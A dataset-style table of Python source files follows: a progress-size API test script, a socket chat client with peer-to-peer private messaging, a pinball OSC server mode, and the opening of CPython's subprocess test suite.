source stringlengths 3 86 | python stringlengths 75 1.04M |
|---|---|
change_progress_size.py | # coding=utf-8
import sys
import threading
import api_server
import progress_data
import utilities
DEFAULT_PROGRESS_SIZE_CIRCULAR = 0.32
DEFAULT_PROGRESS_SIZE_LINEAR = 0.40
DEFAULT_PROGRESS_SIZE = DEFAULT_PROGRESS_SIZE_CIRCULAR
DEFAULT_PROGRESS_DEPTH = 1.6
server_thread = None
def start_server_threaded():
global server_thread
server_thread = threading.Thread(target=api_server.start_server, daemon=True)
server_thread.start()
def stop_server_threaded():
global server_thread
server_thread.join(timeout = 6)
start_server_threaded()
print("starting server")
# utilities.sleep_seconds(1)
api_server.update_server_data(progress_data.get_start_progress_data('configure'))
_type = ''
while _type != 'n':
_type = input("Continue? (c/l/d/r/n)")
if _type == 'l' or _type == 'c' or _type =='s' or _type == 'd':
_size = input('size:')
size = float(_size)
progress = progress_data.get_start_progress_data(_type, _size)
if _type == 'l':
progress_data.add_change_size(progress, size, DEFAULT_PROGRESS_SIZE_CIRCULAR)
if _type == 'c':
progress_data.add_change_size(progress, DEFAULT_PROGRESS_SIZE_LINEAR, size)
if _type == 's':
progress_data.add_change_size(progress, size, size)
if _type == 'd':
progress_data.add_change_depth(progress, size)
# send with configuration
api_server.update_server_data(progress)
# send without configuration
api_server.update_server_data(progress_data.get_start_progress_data(_type, _size))
if _type == 'r':
progress = progress_data.get_start_progress_data('reset size', f'{DEFAULT_PROGRESS_SIZE:.2f}')
progress_data.add_change_size(progress, DEFAULT_PROGRESS_SIZE_LINEAR, DEFAULT_PROGRESS_SIZE_CIRCULAR)
api_server.update_server_data(progress)
progress = progress_data.get_start_progress_data('reset depth', f'{DEFAULT_PROGRESS_DEPTH:.2f}')
progress_data.add_change_depth(progress, DEFAULT_PROGRESS_DEPTH)
api_server.update_server_data(progress)
api_server.update_server_data(progress_data.get_start_progress_data('default'))
# utilities.sleep_seconds(3)
print("stopping server")
stop_server_threaded()
|
client.py | """
Python 3
Usage: python3 TCPClient3.py localhost 12000
coding: utf-8
"""
from socket import *
from threading import Thread
import sys
import threading
import readline
import time
# This function takes the message which needs to be print, and safely prints out
# the message without breaking other threads such as the input and p2p connections
# Reference: https://stackoverflow.com/a/4653306/12208789
def safe_print(*args):
sys.stdout.write('\r' + ' ' * (len(readline.get_line_buffer()) + 2) + '\r')
print(*args, end="")
sys.stdout.flush()
time.sleep(0.1)
# This function creates a private messaging receiver which is listening to incoming
# messages at the given socket and will act correspondingly to the user.
def getPrivateMessageReceiver(p2pSocket):
def privateMessageReceiver():
while True:
data = p2pSocket.recv(1024).decode()
if "['EXIT']" in data:
if "['END']" not in data:
message = data.split()
message = message[0] + " " + message[2] + " ['END']"
peerSocketList[data.split()[1]].send(message.encode())
time.sleep(0.1)
peerSocketList[data.split()[1]].close()
peerSocketList.pop(data.split()[1])
p2pSocket.close()
peerListeningList.pop(data.split()[1])
clientName = data.split()[1]
if len(data.split()) > 3 and data.split()[3] == 'True':
safe_print(f"Private messaging with {clientName} closed due to inactivity\n")
else:
safe_print(f"Private messaging with {clientName} closed\n")
break
else:
safe_print(data + '\n')
return privateMessageReceiver
# This function listens to port which designated to P2P connections for incoming
# network. If a peer is trying to connect to this port to initiate private messaging,
# the function will accept the connection, start a thread with the private socket for
# communication, and add the thread to the peerListeningList for future utilisation.
def privateReceiveConnector():
while True:
p2pSocket, p2pAddress = p2pMessagingSocket.accept()
privateReceiver = getPrivateMessageReceiver(p2pSocket)
privateSocketThread = threading.Thread(target=privateReceiver)
privateSocketThread.daemon = True
privateSocketThread.start()
peerListeningList[p2pClient] = p2pSocket
# This function handles the start of a private messaging connection if requested
# by the client. The function starts a p2p connection correspondingly and possibly
# ask if the user is willing to start p2p and act correspondingly.
def startNewPrivateConnection(userName, targetIp, targetPort, flag):
global allowPrivate
newPeerSocket = socket(AF_INET, SOCK_STREAM)
newPeerSocket.connect((targetIp, int(targetPort)))
if (flag == 'False'):
safe_print(f"{userName} would like to private message, enter y or n: ")
allowPrivate = True
peerSocketList[userName] = newPeerSocket
# This function handles the message being sent to the client. The function will
# decode the message, understand the command, and act correspondingly.
def messageReceiver():
global terminate, userName, p2pClient
while True:
data = clientSocket.recv(1024).decode()
if "['EXIT']" in data:
safe_print(data[:-8])
clientSocket.send("".encode())
for peer in peerSocketList:
peerSocketList[peer].send(f"['EXIT'] {userName} {peer} True".encode())
terminate = True
elif "['TARGET']" in data:
data = data.split()
p2pClient = data[1]
userName = data[4]
startNewPrivateConnection(p2pClient, data[2], data[3], data[5])
else:
safe_print(data)
# This function handles the messages being send from the user. All messages will be
# directed to the server unless the user wishes to privately message a peer or stop
# a private messaging session.
def messageSender():
global terminate, allowPrivate, userName
while True:
message = input()
if message.lower() == "logout":
for peer in peerSocketList:
peerSocketList[peer].send(f"['EXIT'] {userName} {peer}".encode())
clientSocket.send("".encode())
terminate = True
elif allowPrivate == True:
clientSocket.send("['0']".encode())
if message == 'y':
peerSocketList[p2pClient].send(f"{userName} accepts private messaging".encode())
else:
peerSocketList[p2pClient].send(f"{userName} declines private messaging".encode())
time.sleep(0.1)
peerSocketList[message[1]].send(f"['EXIT'] {userName} {p2pClient}".encode())
allowPrivate = False
else:
message = message.split()
if len(message) >= 2 and message[0] == "private":
messageToSend = ' '.join(message[2:])
messageToSend = f"{userName}(private): " + messageToSend
if message[1] in peerSocketList:
clientSocket.send("['0']".encode())
peerSocketList[message[1]].send(messageToSend.encode())
else:
safe_print(f"Error. Private messaging to {message[1]} not enabled\n")
elif len(message) == 2 and message[0] == "stopprivate":
if message[1] in peerSocketList:
clientSocket.send("['0']".encode())
peerSocketList[message[1]].send(f"['EXIT'] {userName} {message[1]}".encode())
else:
safe_print(f"Error. Cannot stop an inexist private session with {message[1]}\n")
else:
clientSocket.send(' '.join(message).encode())
"""
Main execution code of the client
"""
# Verify if sufficient information have been provided by the command line. Proceed
# if sufficient. Print out error and stop execution otherwise.
if len(sys.argv) != 2:
print("\n===== Error usage, python3 TCPClient3.py SERVER_PORT ======\n");
exit(0);
# Acquire serverPort from command line parameter. serverHost have been set to
# localhost, 127.0.0.1, by default. This may be changed for later usage.
# ### Change this line of code if you wish to communicate between different computers.
serverHost = 'localhost'
serverPort = int(sys.argv[1])
serverAddress = (serverHost, serverPort)
# Initialise tracking variables to default. terminate determines if the program needs
# to be terminated, userName keeps track of the userName of the current client.
# p2pClient keeps track of the userName of the p2pClient, and allowPrivate is a flag
# signaling the messageSender if the input is a proper user command or a p2p connection
# decision.
terminate = False
userName = None
p2pClient = ''
allowPrivate = False
# Define socket for the client side and connect the socket to the server.
clientSocket = socket(AF_INET, SOCK_STREAM)
clientSocket.connect(serverAddress)
# Define socket for private messaging, bind the address, and listen to the port for
# connectivity purposes. Additionally, the private messaging port would be obtained
# to notify the server and allow peers have correct port number for private messaging
# connection.
p2pMessagingSocket = socket(AF_INET, SOCK_STREAM)
p2pMessagingSocket.bind(("localhost", 0))
p2pMessagingSocket.listen(1)
p2pMessagingPort = p2pMessagingSocket.getsockname()[1]
clientSocket.send(f"['p2pPort'] {p2pMessagingPort}".encode())
'''
Definition of client side data structure
'''
# The peerSocketList keeps track of the users who have initiated private messaging
# with the client and their corresponding sockets, which would be used to send private
# messages to the user. The peerSocketList is a dictionary in the following format:
# {userNameA: socketA, userNameB: socketB, ...}
peerSocketList = {}
# The peerListeningList keeps track of the users who have initiated private messaging
# with the client and their corresponding listening sockets, which would be responsible
# for receving privates messages from the user. The peerListeningList is a dictionary
# in the following format: {userNameA: socketA, userNameB: socketB, ...}
peerListeningList = {}
# Creates a new thread to handle messages send to the client from the server.
receiverHandler = Thread(name="receiver", target = messageReceiver)
receiverHandler.daemon = True
receiverHandler.start()
# Creates a new thread to handle messages send from the client, including messages
# send to the server and peer via private messaging.
sendHandler = Thread(name="sender", target = messageSender)
sendHandler.daemon = True
sendHandler.start()
# Creates a new thread to listen for private messaging connection, connect if another
# user wishes to start p2p connection with the client.
privateReceiver = Thread(name="privateReceiver", target = privateReceiveConnector)
privateReceiver.daemon = True
privateReceiver.start()
# Main execution loop to keep the code working. If the client needs to be terminated,
# terminate will be set to true and the function exits.
while True:
if terminate:
exit(0)
|
osc.py | import procgame.game
from procgame.game import Mode
import OSC
import socket
import threading
import pinproc
class OSC_Mode(Mode):
"""This is the awesome OSC interface. A few parameters:
game - game object
priority - game mode priority. It doesn't really matter for this mode.
serverIP - the IP address the OSC server will listen on. If you don't pass it anything it will use the default IP address of your computer which should be fine
serverPort - the UDP port the server will listen on. Default 9000
clientIP - the IP address of the client you'd like to connect to. Leave it blank and it will automatically connect to the first client that contacts it
clientPort - the client UDP port. Default is 8000
closed_switches - a list of switch names that you'd like to have set "closed" by default. Good for troughs and stuff. Maybe use some logic here so they're only set to closed with fakepinproc?
"""
def __init__(self, game, priority, serverIP=None, serverPort=9000, clientIP = None, clientPort = 8000, closed_switches=[]):
super(OSC_Mode, self).__init__(game, priority)
self.serverPort = serverPort
self.clientPort = clientPort
self.closed_switches = closed_switches
if not serverIP:
self.serverIP = socket.gethostbyname(socket.gethostname())
else:
self.serverIP = serverIP
self.clientIP = clientIP
self.client_needs_sync = False
self.do_we_have_a_client = False
def mode_started(self):
receive_address = (self.serverIP, self.serverPort) # create a tuple from the IP & UDP port
self.server = OSC.OSCServer(receive_address)
self.server.addDefaultHandlers()
self.server.addMsgHandler("default", self.PROC_OSC_message_handler)
# start the OSC server
self.game.logger.info("OSC Server listening on %s:%s", self.serverIP, self.serverPort)
self.server_thread = threading.Thread(target=self.server.serve_forever)
self.server_thread.start()
self.set_initial_switches()
def mode_stopped(self):
self.OSC_shutdown()
def OSC_shutdown(self):
"""Shuts down the OSC Server thread. If you don't do this python will hang when you exit the game."""
self.server.close()
self.game.logger.info("Waiting for the OSC Server thread to finish")
self.server_thread.join()
self.game.logger.info("OSC Server thread is done.")
def PROC_OSC_message_handler(self, addr, tags, data, client_address):
""" receives OSC messages and acts on them by setting switches."""
#print("recvd OSC message " + str(addr))
# need to add supprt for "sync" instruction which we'll call when switching tabs in touchOSC
#strip out the switch name
switchname = addr.split("/")[-1] # This is the OSC address, not the IP address. Strip out the characters after the final "/"
if switchname in self.game.switches:
switch_number = self.game.switches[switchname].number
else:
switch_number = pinproc.decode(self.game.machine_type, switchname)
# I'm kind of cheating by using desktop.key_events here, but I guess this is ok?
if data[0] == 1.0: # close the switch
self.game.desktop.key_events.append({'type': pinproc.EventTypeSwitchClosedDebounced, 'value': switch_number})
elif data[0] == 0.0: # open the switch
self.game.desktop.key_events.append({'type': pinproc.EventTypeSwitchOpenDebounced, 'value': switch_number})
# since we just got a message from a client, let's set up a connection to it
if not self.do_we_have_a_client:
if not self.clientIP: # if a client IP wasn't specified, use the one that just communicated with us now
self.clientIP = client_address[0]
self.clientTuple = (self.clientIP, self.clientPort)
self.setup_OSC_client(self.clientTuple)
def sync_client(self, OSC_branch=1):
""" Read through all the current switch states and updates the client to set the default states on the client.
Since we don't know whether the client has momentary or toggle switches, we just have to update all of them.
"""
for switch in self.game.switches:
status = 0.0 # set the status to 'off'
if switch.state:
status = 1.0 # if the switch.state is 'True', the switch is closed
self.update_client_switch(switch.name, status, OSC_branch)
self.client_needs_sync = False # since the sync is done we reset the flag
def update_client_switch(self, switch_name, status, OSC_branch=1):
"""update the client switch states.
Parameters
swtich_name - the procgame switch name
status - closed = 1, open = 0
OSC_branch - what OSC branch do you want? For TouchOSC, this defaults to the "tab"
The screen is the /1/ or /2/ or whatever part of the OSC address
"""
if self.do_we_have_a_client: # only do this if we have a client
# Let's build a message. For example OSC address "/1/switchname" with data "1"
self.OSC_message = OSC.OSCMessage()
self.OSC_message.setAddress("/" + str(OSC_branch) + "/" + switch_name)
self.OSC_message.append(status)
self.OSC_client.send(self.OSC_message)
else: # we don't have a client?
self.do_we_have_a_client = False
def setup_OSC_client(self, address):
self.OSC_client = OSC.OSCClient()
self.OSC_client.connect(address)
self.do_we_have_a_client = True
def set_initial_switches(self):
"""sets up the initial switches that should be closed, then marks the client to sync
Should I add some logic here to only do this with fakepinproc?
"""
if ('pinproc_class' in procgame.config.values and
procgame.config.values['pinproc_class'] == 'procgame.fakepinproc.FakePinPROC'):
for switchname in self.closed_switches: # run through the list of closed_switches passed to the mode as args
if switchname in self.game.switches: # convert the names to switch numbers
switch_number = self.game.switches[switchname].number
else:
switch_number = pinproc.decode(self.game.machine_type, switchname)
self.game.desktop.key_events.append({'type': pinproc.EventTypeSwitchClosedDebounced, 'value': switch_number}) # add these switch close events to the queue
self.client_needs_sync = True # Now that this is done we set the flag to sync the client
# we use the flag because if we just did it now it's too fast. The game loop hasn't read in the new closures yet
def mode_tick(self):
"""performs a client sync if we need it"""
if self.do_we_have_a_client: # only proceed if we've establish a connection with a client
if self.client_needs_sync: # if the client is out of sync, then sync it
self.sync_client() |
test_subprocess.py | import unittest
from test import test_support
import subprocess
import sys
import signal
import os
import errno
import tempfile
import time
import re
import sysconfig
try:
import resource
except ImportError:
resource = None
try:
import threading
except ImportError:
threading = None
mswindows = (sys.platform == "win32")
#
# Depends on the following external programs: Python
#
#if mswindows:
# SETBINARY = ('import msvcrt; msvcrt.setmode(sys.stdout.fileno(), '
# 'os.O_BINARY);')
#else:
# SETBINARY = ''
try:
mkstemp = tempfile.mkstemp
except AttributeError:
# tempfile.mkstemp is not available
def mkstemp():
"""Replacement for mkstemp, calling mktemp."""
fname = tempfile.mktemp()
return os.open(fname, os.O_RDWR|os.O_CREAT), fname
class BaseTestCase(unittest.TestCase):
def setUp(self):
# Try to minimize the number of children we have so this test
# doesn't crash on some buildbots (Alphas in particular).
test_support.reap_children()
def tearDown(self):
for inst in subprocess._active:
inst.wait()
subprocess._cleanup()
self.assertFalse(subprocess._active, "subprocess._active not empty")
def assertStderrEqual(self, stderr, expected, msg=None):
# In a debug build, stuff like "[6580 refs]" is printed to stderr at
# shutdown time. That frustrates tests trying to check stderr produced
# from a spawned Python process.
actual = re.sub(r"\[\d+ refs\]\r?\n?$", "", stderr)
self.assertEqual(actual, expected, msg)
class PopenTestException(Exception):
pass
class PopenExecuteChildRaises(subprocess.Popen):
"""Popen subclass for testing cleanup of subprocess.PIPE filehandles when
_execute_child fails.
"""
def _execute_child(self, *args, **kwargs):
raise PopenTestException("Forced Exception for Test")
class ProcessTestCase(BaseTestCase):
def test_call_seq(self):
# call() function with sequence argument
rc = subprocess.call([sys.executable, "-c",
"import sys; sys.exit(47)"])
self.assertEqual(rc, 47)
def test_check_call_zero(self):
# check_call() function with zero return code
rc = subprocess.check_call([sys.executable, "-c",
"import sys; sys.exit(0)"])
self.assertEqual(rc, 0)
def test_check_call_nonzero(self):
# check_call() function with non-zero return code
with self.assertRaises(subprocess.CalledProcessError) as c:
subprocess.check_call([sys.executable, "-c",
"import sys; sys.exit(47)"])
self.assertEqual(c.exception.returncode, 47)
def test_check_output(self):
# check_output() function with zero return code
output = subprocess.check_output(
[sys.executable, "-c", "print 'BDFL'"])
self.assertIn('BDFL', output)
def test_check_output_nonzero(self):
# check_call() function with non-zero return code
with self.assertRaises(subprocess.CalledProcessError) as c:
subprocess.check_output(
[sys.executable, "-c", "import sys; sys.exit(5)"])
self.assertEqual(c.exception.returncode, 5)
def test_check_output_stderr(self):
# check_output() function stderr redirected to stdout
output = subprocess.check_output(
[sys.executable, "-c", "import sys; sys.stderr.write('BDFL')"],
stderr=subprocess.STDOUT)
self.assertIn('BDFL', output)
def test_check_output_stdout_arg(self):
# check_output() function stderr redirected to stdout
with self.assertRaises(ValueError) as c:
output = subprocess.check_output(
[sys.executable, "-c", "print 'will not be run'"],
stdout=sys.stdout)
self.fail("Expected ValueError when stdout arg supplied.")
self.assertIn('stdout', c.exception.args[0])
def test_call_kwargs(self):
# call() function with keyword args
newenv = os.environ.copy()
newenv["FRUIT"] = "banana"
rc = subprocess.call([sys.executable, "-c",
'import sys, os;'
'sys.exit(os.getenv("FRUIT")=="banana")'],
env=newenv)
self.assertEqual(rc, 1)
def test_invalid_args(self):
# Popen() called with invalid arguments should raise TypeError
# but Popen.__del__ should not complain (issue #12085)
with test_support.captured_stderr() as s:
self.assertRaises(TypeError, subprocess.Popen, invalid_arg_name=1)
argcount = subprocess.Popen.__init__.__code__.co_argcount
too_many_args = [0] * (argcount + 1)
self.assertRaises(TypeError, subprocess.Popen, *too_many_args)
self.assertEqual(s.getvalue(), '')
def test_stdin_none(self):
# .stdin is None when not redirected
p = subprocess.Popen([sys.executable, "-c", 'print "banana"'],
stdout=subprocess.PIPE, stderr=subprocess.PIPE)
self.addCleanup(p.stdout.close)
self.addCleanup(p.stderr.close)
p.wait()
self.assertEqual(p.stdin, None)
def test_stdout_none(self):
# .stdout is None when not redirected, and the child's stdout will
# be inherited from the parent. In order to test this we run a
# subprocess in a subprocess:
# this_test
# \-- subprocess created by this test (parent)
# \-- subprocess created by the parent subprocess (child)
# The parent doesn't specify stdout, so the child will use the
# parent's stdout. This test checks that the message printed by the
# child goes to the parent stdout. The parent also checks that the
# child's stdout is None. See #11963.
code = ('import sys; from subprocess import Popen, PIPE;'
'p = Popen([sys.executable, "-c", "print \'test_stdout_none\'"],'
' stdin=PIPE, stderr=PIPE);'
'p.wait(); assert p.stdout is None;')
p = subprocess.Popen([sys.executable, "-c", code],
stdout=subprocess.PIPE, stderr=subprocess.PIPE)
self.addCleanup(p.stdout.close)
self.addCleanup(p.stderr.close)
out, err = p.communicate()
self.assertEqual(p.returncode, 0, err)
self.assertEqual(out.rstrip(), 'test_stdout_none')
def test_stderr_none(self):
# .stderr is None when not redirected
p = subprocess.Popen([sys.executable, "-c", 'print "banana"'],
stdin=subprocess.PIPE, stdout=subprocess.PIPE)
self.addCleanup(p.stdout.close)
self.addCleanup(p.stdin.close)
p.wait()
self.assertEqual(p.stderr, None)
def test_executable_with_cwd(self):
python_dir = os.path.dirname(os.path.realpath(sys.executable))
p = subprocess.Popen(["somethingyoudonthave", "-c",
"import sys; sys.exit(47)"],
executable=sys.executable, cwd=python_dir)
p.wait()
self.assertEqual(p.returncode, 47)
@unittest.skipIf(sysconfig.is_python_build(),
"need an installed Python. See #7774")
def test_executable_without_cwd(self):
# For a normal installation, it should work without 'cwd'
# argument. For test runs in the build directory, see #7774.
p = subprocess.Popen(["somethingyoudonthave", "-c",
"import sys; sys.exit(47)"],
executable=sys.executable)
p.wait()
self.assertEqual(p.returncode, 47)
def test_stdin_pipe(self):
# stdin redirection
p = subprocess.Popen([sys.executable, "-c",
'import sys; sys.exit(sys.stdin.read() == "pear")'],
stdin=subprocess.PIPE)
p.stdin.write("pear")
p.stdin.close()
p.wait()
self.assertEqual(p.returncode, 1)
def test_stdin_filedes(self):
# stdin is set to open file descriptor
tf = tempfile.TemporaryFile()
d = tf.fileno()
os.write(d, "pear")
os.lseek(d, 0, 0)
p = subprocess.Popen([sys.executable, "-c",
'import sys; sys.exit(sys.stdin.read() == "pear")'],
stdin=d)
p.wait()
self.assertEqual(p.returncode, 1)
def test_stdin_fileobj(self):
# stdin is set to open file object
tf = tempfile.TemporaryFile()
tf.write("pear")
tf.seek(0)
p = subprocess.Popen([sys.executable, "-c",
'import sys; sys.exit(sys.stdin.read() == "pear")'],
stdin=tf)
p.wait()
self.assertEqual(p.returncode, 1)
def test_stdout_pipe(self):
# stdout redirection
p = subprocess.Popen([sys.executable, "-c",
'import sys; sys.stdout.write("orange")'],
stdout=subprocess.PIPE)
self.addCleanup(p.stdout.close)
self.assertEqual(p.stdout.read(), "orange")
def test_stdout_filedes(self):
# stdout is set to open file descriptor
tf = tempfile.TemporaryFile()
d = tf.fileno()
p = subprocess.Popen([sys.executable, "-c",
'import sys; sys.stdout.write("orange")'],
stdout=d)
p.wait()
os.lseek(d, 0, 0)
self.assertEqual(os.read(d, 1024), "orange")
def test_stdout_fileobj(self):
# stdout is set to open file object
tf = tempfile.TemporaryFile()
p = subprocess.Popen([sys.executable, "-c",
'import sys; sys.stdout.write("orange")'],
stdout=tf)
p.wait()
tf.seek(0)
self.assertEqual(tf.read(), "orange")
def test_stderr_pipe(self):
# stderr redirection
p = subprocess.Popen([sys.executable, "-c",
'import sys; sys.stderr.write("strawberry")'],
stderr=subprocess.PIPE)
self.addCleanup(p.stderr.close)
self.assertStderrEqual(p.stderr.read(), "strawberry")
def test_stderr_filedes(self):
# stderr is set to open file descriptor
tf = tempfile.TemporaryFile()
d = tf.fileno()
p = subprocess.Popen([sys.executable, "-c",
'import sys; sys.stderr.write("strawberry")'],
stderr=d)
p.wait()
os.lseek(d, 0, 0)
self.assertStderrEqual(os.read(d, 1024), "strawberry")
def test_stderr_fileobj(self):
# stderr is set to open file object
tf = tempfile.TemporaryFile()
p = subprocess.Popen([sys.executable, "-c",
'import sys; sys.stderr.write("strawberry")'],
stderr=tf)
p.wait()
tf.seek(0)
self.assertStderrEqual(tf.read(), "strawberry")
def test_stdout_stderr_pipe(self):
# capture stdout and stderr to the same pipe
p = subprocess.Popen([sys.executable, "-c",
'import sys;'
'sys.stdout.write("apple");'
'sys.stdout.flush();'
'sys.stderr.write("orange")'],
stdout=subprocess.PIPE,
stderr=subprocess.STDOUT)
self.addCleanup(p.stdout.close)
self.assertStderrEqual(p.stdout.read(), "appleorange")
def test_stdout_stderr_file(self):
# capture stdout and stderr to the same open file
tf = tempfile.TemporaryFile()
p = subprocess.Popen([sys.executable, "-c",
'import sys;'
'sys.stdout.write("apple");'
'sys.stdout.flush();'
'sys.stderr.write("orange")'],
stdout=tf,
stderr=tf)
p.wait()
tf.seek(0)
self.assertStderrEqual(tf.read(), "appleorange")
def test_stdout_filedes_of_stdout(self):
# stdout is set to 1 (#1531862).
# To avoid printing the text on stdout, we do something similar to
# test_stdout_none (see above). The parent subprocess calls the child
# subprocess passing stdout=1, and this test uses stdout=PIPE in
# order to capture and check the output of the parent. See #11963.
code = ('import sys, subprocess; '
'rc = subprocess.call([sys.executable, "-c", '
' "import os, sys; sys.exit(os.write(sys.stdout.fileno(), '
'\'test with stdout=1\'))"], stdout=1); '
'assert rc == 18')
p = subprocess.Popen([sys.executable, "-c", code],
stdout=subprocess.PIPE, stderr=subprocess.PIPE)
self.addCleanup(p.stdout.close)
self.addCleanup(p.stderr.close)
out, err = p.communicate()
self.assertEqual(p.returncode, 0, err)
self.assertEqual(out.rstrip(), 'test with stdout=1')
def test_cwd(self):
tmpdir = tempfile.gettempdir()
# We cannot use os.path.realpath to canonicalize the path,
# since it doesn't expand Tru64 {memb} strings. See bug 1063571.
cwd = os.getcwd()
os.chdir(tmpdir)
tmpdir = os.getcwd()
os.chdir(cwd)
p = subprocess.Popen([sys.executable, "-c",
'import sys,os;'
'sys.stdout.write(os.getcwd())'],
stdout=subprocess.PIPE,
cwd=tmpdir)
self.addCleanup(p.stdout.close)
normcase = os.path.normcase
self.assertEqual(normcase(p.stdout.read()), normcase(tmpdir))
def test_env(self):
newenv = os.environ.copy()
newenv["FRUIT"] = "orange"
p = subprocess.Popen([sys.executable, "-c",
'import sys,os;'
'sys.stdout.write(os.getenv("FRUIT"))'],
stdout=subprocess.PIPE,
env=newenv)
self.addCleanup(p.stdout.close)
self.assertEqual(p.stdout.read(), "orange")
def test_communicate_stdin(self):
p = subprocess.Popen([sys.executable, "-c",
'import sys;'
'sys.exit(sys.stdin.read() == "pear")'],
stdin=subprocess.PIPE)
p.communicate("pear")
self.assertEqual(p.returncode, 1)
def test_communicate_stdout(self):
p = subprocess.Popen([sys.executable, "-c",
'import sys; sys.stdout.write("pineapple")'],
stdout=subprocess.PIPE)
(stdout, stderr) = p.communicate()
self.assertEqual(stdout, "pineapple")
self.assertEqual(stderr, None)
def test_communicate_stderr(self):
p = subprocess.Popen([sys.executable, "-c",
'import sys; sys.stderr.write("pineapple")'],
stderr=subprocess.PIPE)
(stdout, stderr) = p.communicate()
self.assertEqual(stdout, None)
self.assertStderrEqual(stderr, "pineapple")
def test_communicate(self):
p = subprocess.Popen([sys.executable, "-c",
'import sys,os;'
'sys.stderr.write("pineapple");'
'sys.stdout.write(sys.stdin.read())'],
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
self.addCleanup(p.stdout.close)
self.addCleanup(p.stderr.close)
self.addCleanup(p.stdin.close)
(stdout, stderr) = p.communicate("banana")
self.assertEqual(stdout, "banana")
self.assertStderrEqual(stderr, "pineapple")
# This test is Linux specific for simplicity to at least have
# some coverage. It is not a platform specific bug.
@unittest.skipUnless(os.path.isdir('/proc/%d/fd' % os.getpid()),
"Linux specific")
# Test for the fd leak reported in http://bugs.python.org/issue2791.
def test_communicate_pipe_fd_leak(self):
fd_directory = '/proc/%d/fd' % os.getpid()
num_fds_before_popen = len(os.listdir(fd_directory))
p = subprocess.Popen([sys.executable, "-c", "print()"],
stdout=subprocess.PIPE)
p.communicate()
num_fds_after_communicate = len(os.listdir(fd_directory))
del p
num_fds_after_destruction = len(os.listdir(fd_directory))
self.assertEqual(num_fds_before_popen, num_fds_after_destruction)
self.assertEqual(num_fds_before_popen, num_fds_after_communicate)
def test_communicate_returns(self):
# communicate() should return None if no redirection is active
p = subprocess.Popen([sys.executable, "-c",
"import sys; sys.exit(47)"])
(stdout, stderr) = p.communicate()
self.assertEqual(stdout, None)
self.assertEqual(stderr, None)
def test_communicate_pipe_buf(self):
# communicate() with writes larger than pipe_buf
# This test will probably deadlock rather than fail, if
# communicate() does not work properly.
x, y = os.pipe()
if mswindows:
pipe_buf = 512
else:
pipe_buf = os.fpathconf(x, "PC_PIPE_BUF")
os.close(x)
os.close(y)
p = subprocess.Popen([sys.executable, "-c",
'import sys,os;'
'sys.stdout.write(sys.stdin.read(47));'
'sys.stderr.write("xyz"*%d);'
'sys.stdout.write(sys.stdin.read())' % pipe_buf],
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
self.addCleanup(p.stdout.close)
self.addCleanup(p.stderr.close)
self.addCleanup(p.stdin.close)
string_to_write = "abc"*pipe_buf
(stdout, stderr) = p.communicate(string_to_write)
self.assertEqual(stdout, string_to_write)
def test_writes_before_communicate(self):
# stdin.write before communicate()
p = subprocess.Popen([sys.executable, "-c",
'import sys,os;'
'sys.stdout.write(sys.stdin.read())'],
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
self.addCleanup(p.stdout.close)
self.addCleanup(p.stderr.close)
self.addCleanup(p.stdin.close)
p.stdin.write("banana")
(stdout, stderr) = p.communicate("split")
self.assertEqual(stdout, "bananasplit")
self.assertStderrEqual(stderr, "")
def test_universal_newlines(self):
# NB. replaced SETBINARY with the -u flag
p = subprocess.Popen([sys.executable, "-u", "-c",
'import sys,os;' + #SETBINARY +
'sys.stdout.write("line1\\n");'
'sys.stdout.flush();'
'sys.stdout.write("line2\\r");'
'sys.stdout.flush();'
'sys.stdout.write("line3\\r\\n");'
'sys.stdout.flush();'
'sys.stdout.write("line4\\r");'
'sys.stdout.flush();'
'sys.stdout.write("\\nline5");'
'sys.stdout.flush();'
'sys.stdout.write("\\nline6");'],
stdout=subprocess.PIPE,
universal_newlines=1)
self.addCleanup(p.stdout.close)
stdout = p.stdout.read()
if hasattr(file, 'newlines'):
# Interpreter with universal newline support
self.assertEqual(stdout,
"line1\nline2\nline3\nline4\nline5\nline6")
else:
# Interpreter without universal newline support
self.assertEqual(stdout,
"line1\nline2\rline3\r\nline4\r\nline5\nline6")
def test_universal_newlines_communicate(self):
# universal newlines through communicate()
# NB. replaced SETBINARY with the -u flag
p = subprocess.Popen([sys.executable, "-u", "-c",
'import sys,os;' + #SETBINARY +
'sys.stdout.write("line1\\n");'
'sys.stdout.flush();'
'sys.stdout.write("line2\\r");'
'sys.stdout.flush();'
'sys.stdout.write("line3\\r\\n");'
'sys.stdout.flush();'
'sys.stdout.write("line4\\r");'
'sys.stdout.flush();'
'sys.stdout.write("\\nline5");'
'sys.stdout.flush();'
'sys.stdout.write("\\nline6");'],
stdout=subprocess.PIPE, stderr=subprocess.PIPE,
universal_newlines=1)
self.addCleanup(p.stdout.close)
self.addCleanup(p.stderr.close)
(stdout, stderr) = p.communicate()
if hasattr(file, 'newlines'):
# Interpreter with universal newline support
self.assertEqual(stdout,
"line1\nline2\nline3\nline4\nline5\nline6")
else:
# Interpreter without universal newline support
self.assertEqual(stdout,
"line1\nline2\rline3\r\nline4\r\nline5\nline6")
def test_no_leaking(self):
# Make sure we leak no resources
if not mswindows:
max_handles = 1026 # too much for most UNIX systems
else:
max_handles = 2050 # too much for (at least some) Windows setups
handles = []
try:
for i in range(max_handles):
try:
handles.append(os.open(test_support.TESTFN,
os.O_WRONLY | os.O_CREAT))
except OSError as e:
if e.errno != errno.EMFILE:
raise
break
else:
self.skipTest("failed to reach the file descriptor limit "
"(tried %d)" % max_handles)
# Close a couple of them (should be enough for a subprocess)
for i in range(10):
os.close(handles.pop())
# Loop creating some subprocesses. If one of them leaks some fds,
# the next loop iteration will fail by reaching the max fd limit.
for i in range(15):
p = subprocess.Popen([sys.executable, "-c",
"import sys;"
"sys.stdout.write(sys.stdin.read())"],
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
data = p.communicate(b"lime")[0]
self.assertEqual(data, b"lime")
finally:
for h in handles:
os.close(h)
test_support.unlink(test_support.TESTFN)
def test_list2cmdline(self):
self.assertEqual(subprocess.list2cmdline(['a b c', 'd', 'e']),
'"a b c" d e')
self.assertEqual(subprocess.list2cmdline(['ab"c', '\\', 'd']),
'ab\\"c \\ d')
self.assertEqual(subprocess.list2cmdline(['ab"c', ' \\', 'd']),
'ab\\"c " \\\\" d')
self.assertEqual(subprocess.list2cmdline(['a\\\\\\b', 'de fg', 'h']),
'a\\\\\\b "de fg" h')
